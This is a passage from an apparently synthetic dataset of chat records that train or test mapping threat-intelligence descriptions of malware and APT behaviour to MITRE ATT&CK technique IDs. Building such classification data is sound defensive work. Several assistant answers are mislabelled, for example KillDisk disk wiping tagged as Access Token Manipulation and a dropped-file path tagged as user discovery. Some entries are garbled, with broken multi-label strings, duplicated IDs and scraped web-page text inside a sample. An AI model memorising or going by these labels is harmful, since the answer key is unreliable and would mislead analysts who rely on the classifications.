- "content": "T1059.006 - Command and Scripting Interpreter: Python"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dyre has the ability to send information staged on a compromised host externally to C2."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Egregor can perform a language check of the infected system and can query the CPU information (cupid)."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BITTER has executed OLE objects using Microsoft Equation Editor to download and run malicious payloads."
- },
- {
- "role": "assistant",
- "content": "T1559.002 - Inter-Process Communication: Dynamic Data Exchange"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Elise injects DLL files into iexplore.exe."
- },
- {
- "role": "assistant",
- "content": "T1055.001 - Process Injection: Dynamic-link Library Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It also creates a folder in C:\\SDRSMLINK\\ and shares this folder with the rest of the network"
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 'T1564.006 - Run Virtual Instance"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ahnlab, a South Korean software company, simultaneously published a paper regarding Bisonal's activity in South Korea. The initial stage is a binary that drops a decoy document (Powerpoint or Excel document), a VisualBasic script and the packed Bisonal payload. The payload is dropped with a .jpg extension that's been renamed to \".exe. Here is an example decoy document: The purpose of the VisualBasic script is to execute the payload. Although the malicious part of the binary is only 2MB, the final file is more than 120MB in size, padded out with random data. The payload has been packed with a new packer. The code of Bisonal is similar to the version of 2019"
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 has added credentials to OAuth Applications and Service Principals."
- },
- {
- "role": "assistant",
- "content": "T1098.001 - Account Manipulation: Additional Cloud Credentials"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "IndigoZebra created Dropbox accounts for their operations."
- },
- {
- "role": "assistant",
- "content": "T1583.006 - Web Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The adversaries installed the backdoor as a service on the infected machine. They attempted to operate under the radar by naming the service \"Windows Time Service\", like the existing Windows service"
- },
- {
- "role": "assistant",
- "content": "T1036.004 - Masquerading: Masquerade Task or Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The adversary used the built-in lateral movement possibilities in Cobalt Strike. Cobalt Strike has various methods for deploying its beacons at newly compromised systems. We have seen the adversary using SMB, named pipes, PsExec, and WinRM. They continue lateral movement and discovery in an attempt to identify the data of interest"
- },
- {
- "role": "assistant",
- "content": "T1021.006 - Remote Services: Windows Remote Management"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Hildegard has used history -c to clear script shell logs."
- },
- {
- "role": "assistant",
- "content": "T1070.003 - Indicator Removal on Host: Clear Command History"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MacSpy deletes any temporary files it creates"
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Hikit has the ability to download files to a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Most strings in are encrypted using 3DES and XOR and reversed."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT37's has added persistence via the Registry key \"HKCU\\Software\\Microsoft\\CurrentVersion\\Run\\\"."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TA551 has used a DGA to generate URLs from executed macros."
- },
- {
- "role": "assistant",
- "content": "T1568.002 - Domain Generation Algorithms"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LazyScripter has established GitHub accounts to host its toolsets."
- },
- {
- "role": "assistant",
- "content": "T1583.006 - Web Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "attempted to get users to click on Microsoft Excel attachments containing malicious macro scripts."
- },
- {
- "role": "assistant",
- "content": "T1204 - User Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT32 has used the WindowStyle parameter to conceal PowerShell windows."
- },
- {
- "role": "assistant",
- "content": "T1564.003 - Hide Artifacts: Hidden Window"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HOPLIGHT has used its C2 channel to exfiltrate data."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Imminent Monitor has uploaded a file containing debugger logs, network information and system information to the C2."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Egregor has masqueraded the svchost.exe process to exfiltrate data."
- },
- {
- "role": "assistant",
- "content": "T1036.004 - Masquerading: Masquerade Task or Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MedusaLocker is a ransomware family that was first seen in the wild in early October 2019. In January 2020, a fork of MedusaLocker named Ako was observed, which has been updated to support the use of a Tor hidden service to facilitate a RaaS model. Operators of the Ako version of the malware have since implemented a DLS (Figure 12). At least nine victims have been published to the site since its inception."
- },
- {
- "role": "assistant",
- "content": "T1588.001 - Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can download and execute an arbitary executable."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This threat actor initially came to our attention in April 2018, leveraging both Western and Chinese Git repositories to deliver malware to honeypot systems vulnerable to an Apache Struts vulnerability"
- },
- {
- "role": "assistant",
- "content": "T1190 - Exploit Public-Facing Application"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Wizard Spider has used Digicert code-signing certificates for some of its malware."
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can enumerate active windows."
- },
- {
- "role": "assistant",
- "content": "T1010 - Application Window Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "creates a backdoor through which remote attackers can steal system information."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System', 'T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "REvil has the capability to destroy files and folders."
- },
- {
- "role": "assistant",
- "content": "T1485 - Data Destruction"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Turla has compromised internal network systems to act as a proxy to forward traffic to C2."
- },
- {
- "role": "assistant",
- "content": "T1090.001 - Proxy: Internal Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PLAINTEE encodes C2 beacons using XOR."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mustang Panda has created a scheduled task to execute additional malicious software, as well as maintain persistence."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT33 has used compromised Office 365 accounts in tandem with Ruler in an attempt to gain control of endpoints."
- },
- {
- "role": "assistant",
- "content": "T1078.004 - Valid Accounts: Cloud Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "We suspect the attacker was trying to generate sympathy by reminding the reader that Munchon and the province it is in, Kangwon, were part of a unified province that included South Korea's Gangwon-do prior to the division of Korea in 1945.A second email contained a story about a person called 'Ewing Kim' who was looking for help:The email's attachments are two different HWP documents, both leveraging same vulnerability (CVE-2013-0808)"
- },
- {
- "role": "assistant",
- "content": "T1598.002 - Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cadelspy has the ability to compress stolen data into a .cab file."
- },
- {
- "role": "assistant",
- "content": "T1560 - Archive Collected Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Elise executes \"net user\" after initial communication is made to the remote server."
- },
- {
- "role": "assistant",
- "content": "T1087.001 - Account Discovery: Local Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PIONEER KITTEN’s namesake operational characteristic is its reliance on SSH tunneling, through open-source tools such as Ngrok and the adversary’s custom tool SSHMinion, for communication with implants and hands-on-keyboard activity via Remote Desktop Protocol (RDP"
- },
- {
- "role": "assistant",
- "content": "T1572 - Protocol Tunneling"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "File is dropped to C:\\Users\\%USERNAME%\\AppData\\Roaming\\Microsoft Network\\microsoft_network\\1.0.0.0\\microsoft_network.exe"
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "VBShower used \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\\\[a-f0-9A-F]{8}\" to maintain persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Figure 32 shows QUADAGENT issuing DNS requests with incrementing sequence numbers and the C2 providing the session identifier and pre-shared key within the IPv6 answers. The screenshot also shows the Trojan sending a DNS query to notify the C2 that it successfully received the data."
- },
- {
- "role": "assistant",
- "content": "T1583.002 - DNS Server"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This simple backdoor is likely used as a second-chance backdoor to maintain access to the system, even if the primary malware is removed. It could also be used as a second-stage dropper to infect the system with additional malware"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OilRig has used various types of scripting for execution."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In May 2016, we published a blog detailing a spear phishing campaign targeting banks in the Middle East region that used macro-enabled attachments to distribute POWBAT malware"
- },
- {
- "role": "assistant",
- "content": "T1598.002 - Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "down_new has the ability to gather information on installed applications."
- },
- {
- "role": "assistant",
- "content": "T1518 - Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NavRAT is able to download and execute files located in the attachment of a received email"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ThreatNeedle has been compressed and obfuscated using RC4, AES, or XOR."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HOPLIGHT has multiple C2 channels in place in case one fails."
- },
- {
- "role": "assistant",
- "content": "T1008 - Fallback Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Action RAT has the ability to collect the MAC address of an infected host."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 gained initial network access to some victims via a trojanized update of SolarWinds Orion software."
- },
- {
- "role": "assistant",
- "content": "T1195.002 - Compromise Software Supply Chain"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The script will then proceed to download a tar compressed archive from a download server according to the architecture of the compromised system"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Attor's has a plugin that is capable of recording audio using available input sound devices."
- },
- {
- "role": "assistant",
- "content": "T1123 - Audio Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT28 executed CHOPSTICK by using rundll32 commands such as \"rundll32.exe “C:\\Windows\\twain_64.dll”\". APT28 also executed a .dll for a first stage dropper using rundll32.exe. An APT28 loader Trojan saved a batch script that uses rundll32 to execute a DLL payload."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Astaroth has used malicious files including VBS, LNK, and HTML for execution."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FLASHFLOOD stages data it copies from the local system or removable drives in the \"%WINDIR%\\$NtUninstallKB885884$\\\" directory."
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OwaAuth is a Web shell that appears to be exclusively used by Threat Group-3390. It is installed as an ISAPI filter on Exchange servers and shares characteristics with the China Chopper Web shell."
- },
- {
- "role": "assistant",
- "content": "T1505.003 - Server Software Component: Web Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KillDisk’s infection chain . How is it dropped in the system. This KillDisk variant looks like it is intentionally dropped by another process/attacker. The new KillDisk variant’s parameter to shut down the affected machine . KillDisk also has a self-destruct process, although it isn’t really deleting itself. Code snippets showing how KillDisk overwrites then deletes files . How does it wipe the disk. It reads the Master Boot Record (MBR) of every device it successfully opens and proceeds to overwrite the first 0x20 sectors of the device with “0x00”. It uses the information from the MBR to do further damage to the partitions it lists. KillDisk has a numeric parameter that denotes the number of minutes (15 being the default) it will wait before it shuts down the affected machine. To try to reboot the machine, it will try to terminate these processes: This is done most likely to force a reboot or dupe the user into restarting the machine. Additionally, the website utilizes an AI-based application that runs in the background and optimizes its accessibility level constantly. Vision Impaired Profile: this profile adjusts the website so that it is accessible to the majority of visual impairments such as Degrading Eyesight, Tunnel Vision, Cataract, Glaucoma, and others. Accept Cancel Continue Processing the data, please give it a few seconds"
- },
- {
- "role": "assistant",
- "content": "T1134 - Access Token Manipulation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "kills and disables services by using cmd.exe."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attackers used spear phishing emails combined with malicious HWP documents created using Hancom Hangul Office Suite"
- },
- {
- "role": "assistant",
- "content": "T1598.002 - Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dragonfly has collected open source information to identify relationships between organizations for targeting purposes."
- },
- {
- "role": "assistant",
- "content": "T1591.002 - Business Relationships"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ZxxZ has relied on victims to open a malicious attachment delivered via email."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses the command-line interface to execute arbitrary commands."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Putty – can be leveraged by attackers for remote access, to exfiltrate data and send it back to attackers - PSExec – is a legitimate Microsoft tool that can be exploited by malicious actors and used for lateral movement across victim networks - SNScan – this tool can be used for network reconnaissance, to find other potential targets on victim networks - WinRAR – is an archiving tool that can be used to compress files (potentially to make them easier to send back to attackers) and also to extract files from zipped folders"
- },
- {
- "role": "assistant",
- "content": "T1046 - Network Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KOCTOPUS has deobfuscated itself before executing its commands."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Naid collects the domain name from a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The client has been signed by fake and invalid digital certificates."
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FinFisher probes the system to check for antimalware processes."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CharmPower can delete created files from a compromised system."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The second file is a PowerShell script which appears to be based on a Rapid7 Ruby Exploitation script that loads arbitrary shellcode"
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter', 'T1064 - Scripting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pillowmint has used shellcode which reads code stored in the registry keys \"\\REGISTRY\\SOFTWARE\\Microsoft\\DRM\" using the native Windows API as well as read \"HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\" as part of its C2."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This document was a decoy aimed to entice the user to open malicious documents embedded further down the pageThe actor embedded two additional links and the document urged the user to click on these links for more information about New Year's activities in North Korea"
- },
- {
- "role": "assistant",
- "content": "T1204 - User Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Attor has exfiltrated data over the C2 channel."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "leveraged the tool LaZagne for retrieving login and password information."
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SMOKEDHAM has used the \"systeminfo\" command on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
